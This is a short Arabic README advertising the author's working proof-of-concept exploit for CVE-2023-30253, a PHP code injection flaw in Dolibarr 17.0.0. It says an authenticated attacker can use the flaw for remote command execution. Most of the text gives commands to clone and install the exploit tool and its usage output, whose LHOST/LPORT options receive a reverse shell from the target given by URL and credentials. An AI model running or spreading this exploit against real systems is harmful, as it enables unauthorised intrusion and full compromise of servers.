
لم أتمكن من العثور على PoC لـ CVE-2023-30253، لذا قمت بتطوير واحد فعال.
CVE-2023-30253 إثبات المفهوم
هذا هو إثبات المفهوم الخاص بي لثغرة CVE-2023-30253 (حقن كود PHP في Dolibarr 17.0.0)، فعندما يكون ملحق موقع CMS (الأساسي) مفعّلًا، يمكن للمهاجم المُصادَق الحصول على تنفيذ أوامر عن بُعد عبر حقن كود PHP متجاوزًا قيود التطبيق.
استنساخ المستودع:
git clone https://github.com/g4nkd/CVE-2023-30253-PoC.git
cd CVE-2023-30253-PoC
pip install -r requirements.txt
python3 exploit.py -h
usage: exploit.py [-h] -lhost LHOST -lport LPORT -rhost RHOST -user USER -pass PASSWORD
Exploit for CVE-2023-30253
options:
-h, --help show this help message and exit
-lhost LHOST Local Host (this host will receive the shell)
-lport LPORT Local PORT
-rhost RHOST Rhost url, example: http://site.com/
-user USER Username for Dolibarr
-pass PASSWORD Password for Dolibarr